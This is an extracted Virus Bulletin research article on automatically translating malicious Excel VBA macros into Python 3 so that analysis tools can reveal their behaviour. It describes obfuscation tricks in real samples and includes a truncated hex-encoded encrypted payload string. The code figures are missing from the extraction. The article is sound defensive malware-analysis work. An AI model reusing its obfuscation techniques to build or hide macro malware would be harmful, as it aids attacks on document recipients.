Run Your Malicious Vba Anywhere
Run Your Malicious Vba Anywhere
com
Covering the
global threat landscape
INTRODUCTION
Obfuscation is an old trick every malware researcher and scanner engine needs to get around in order to find the real content of
the sample they are analysing. The type and level of obfuscation varies, but in general, the idea is to make it difficult to understand
what a sample is really doing – which can reduce the accuracy in correctly handling it.
Office documents have over many decades been used to launch malware, often through macros, embedded content or exploits.
Embedded ‘executable’ content is usually very visible, and with most exploits, even if you don’t know exactly what is being
exploited, the presence of strange data in strange locations is usually a good giveaway that something is going on. The same is true
for hand-crafted RTFs with lots of obfuscation – they just shine in the dark.
I wanted to understand whether it’s possible to recompile VBA macros to another language, which could then easily be ‘run’ on
any gateway and thus reveal the sample’s true nature in a safe manner. Documents do have some privacy concerns, and being
able to carry out a full analysis of any (malicious) document on e.g. an email server inline with something that is light, accurate,
inexpensive and flexible could help improve the accuracy and time taken to make decisions. Regular sandbox solutions that require
Windows, Office, monitoring agents and quite a bit of hardware are neither light nor inexpensive.
APRIL 2021 1
VIRUS BULLETIN www.virusbulletin.com
This is a very simple sample and it wouldn’t take a lot of time to convert it manually to Python 3.x. As you’ll find out, manual
conversion and automatic conversion are two completely different things, but you need to start somewhere.
There are no arrays, complex equations, predefined variables or classes, divides that cause incompatibility with Python, etc. Here
you see some variables being defined, two objects being created and used (download and store), and at the end something is being
executed via Shell.
When this is auto-converted to Python 3.x it looks like this:
2 APRIL 2021
VIRUS BULLETIN www.virusbulletin.com
As you can see, it’s a simple downloader – but you saw that already with the initial VBA macro code as it wasn’t obfuscated much.
This was just to get warm. The output of a sample is just the application-world printing out the behaviour it wants to report, while
it acts as the Office world for the sample.
Sample 2 (e4debf873d683a51626882ba69364b54e5881799) will let us start removing obfuscation. The Workbook_Open macro of
this sample starts like this:
As you can clearly see, the Select Case statements look a bit funky (I had to read them a few times before I realized what it was
trying to do), but if you take a closer look at the variable the select is from (m222371a95aa9d8), it’s initially set to 3 – and this
‘Case’ is the only one you need. Of course, you don’t know if ‘that is always the case’ so you port all the code to Python – always.
This is just done to confuse an algorithm or human.
Case 3 just creates a specific object based on an encrypted string – decrypted via function rd165a9f386b4b. Once this object is
created, it wants to execute the Exec method of the object. To find out what it wants to execute, it spawns the same decryption
function (rd165a9f386b4b) with data from a specific Excel cell:
index,name,row,col,value
1,ZAOIQ,6,134,"8281897784857A777E7E40778A77323F897B8076818985868B7E77327A7B76767780323F8081828481787B7E77323F578
A777587867B818062817E7B758B3264777F818677657B798077761F1C78878075867B818032804645787877328D1F1C827384737F3A367A7
3467878743B1F1C3685454548......
To find the cell information you need to enumerate the Workbook stream and look for records like:
• Formula: to get the parsed expressions of code running.
• SST/extSST: to find strings and their locations in the sheets.
• LabelSst/Lbl: to find labels used in Formula parsed expressions.
• Dimension handler: to find the sheet dimensions used.
• Rk and MulRk: to find integers and floats and their locations in the sheets.
After all these are parsed you will have a good map which is provided via the Excel object-model to the VBA/XF code.
Once it gets the data (above) it calls the decryption function:
This is nothing fancy: it reads two characters at a time and converts them to integers so they can be manipulated and then converted
back to characters and appended to the destination string. The beautiful consequence of converting the code and running it is that
you don’t really care what it does or how it does it, you want to know the effect of it.
APRIL 2021 3
VIRUS BULLETIN www.virusbulletin.com
Once the entire VBA macro is converted to Python 3.x and run, you get the following output:
The object it wanted to create was Wscript.Shell, and the .Exec method was spawning a PowerShell script – which also has its own
encryption. Sample 3 (ddcbcf91d98ac04ffbc90ff597bab6263c69eded) again raises some issues when you want to convert the code
automagically to Python. This time it looks like there is a lot of data waiting to be decrypted – but it’s not there. Once again, this is
to confuse humans and algorithms trying to decode or x-ray ‘data’.
You’ll see a lot of variables being set to ‘random’ data, which you might assume will be decrypted at some point. Instead, a
function, KC_U, is invoked further into the Workbook_Open macro, which looks like this:
4 APRIL 2021
VIRUS BULLETIN www.virusbulletin.com
A TxO record in the Workbook stream seems to follow an MsoDrawing object, and the Obj record describing this uses type
0x19 (Note) to Obj 1.
In the Python 3 world, the function KC_U will look like this (with the @goto support):
When, at the end, we run the generated Python 3 code, we get the behaviour of the VBA macro spelled out:
APRIL 2021 5
VIRUS BULLETIN www.virusbulletin.com
Before the real classes are defined for the VBA macro streams, Python needs to know about them for the first pass (it doesn’t have
to understand what they are, just know that they are there) and UserForm classes (if applicable) need to be created and initialized.
This is an example of a complete rewritten simple VBA macro in Python 3.x form:
6 APRIL 2021
VIRUS BULLETIN www.virusbulletin.com
CONCLUSIONS
After quite a few hours spent on this ‘fun’ project I’ve learned a lot of lessons. Languages are complicated and moving the same
logic from one language to another can’t be done in a hurry.
Let me run through a few of the challenges:
• Arrays in VBA aren’t indexed with ‘[’ – you’ll need to figure out what variable is being referenced and its size to determine if
a ‘[’ is needed for the Python world.
• Calculations that VBA handles fine as double/floats even though they are stored in Long will cause problems in Python when
you want to slice something based on a double/float. You’ll need to find the right time and place to convert it to an int(). Not
too soon, as it might affect the calculation/result (which could cause out-of-buffer access), and not too late.
• Calling subroutines and certain APIs in VBA doesn’t require ‘()’ around parameters – you’ll need to figure out what is what.
• Referencing local variables when they are in a Python class means some ‘.self’ references need to be inserted so you always
reference the right object. You also need to make sure to declare global variables, so you make sure e.g. UserForm access is
via the same expected object.
• I wrote two tokenizers for each line in order to handle ‘complicated’ expressions, e.g. is this a function call, and if so, where
do we insert the ‘()’ for the parameters?
APRIL 2021 7
VIRUS BULLETIN www.virusbulletin.com
Application.Run is a call to the application-world to run XF code from the sheet ‘Brisk’ from the ‘CD5’ location. This means the
‘Run’ function will need to translate the XF code to Pyhthon as well – and this will be the next project.
These lessons learned count for many of the issues faced, and the rest is pain as you go – but the fact that the initial results (and
speed, a few milliseconds) are all that is needed to run malicious VBA macros on any platform gives me confidence that this could
be useful for many situations and is worth the hours spent.
REFERENCES
[1] https://pypi.org/project/goto-statement/.
[2] https://libnotfound.com/2021/03/24/automatically-generate-python-3-x-from-malicious-vba-macros/.
[3] https://libnotfound.com/2021/03/10/running-vba-as-python-part-2/.
8 APRIL 2021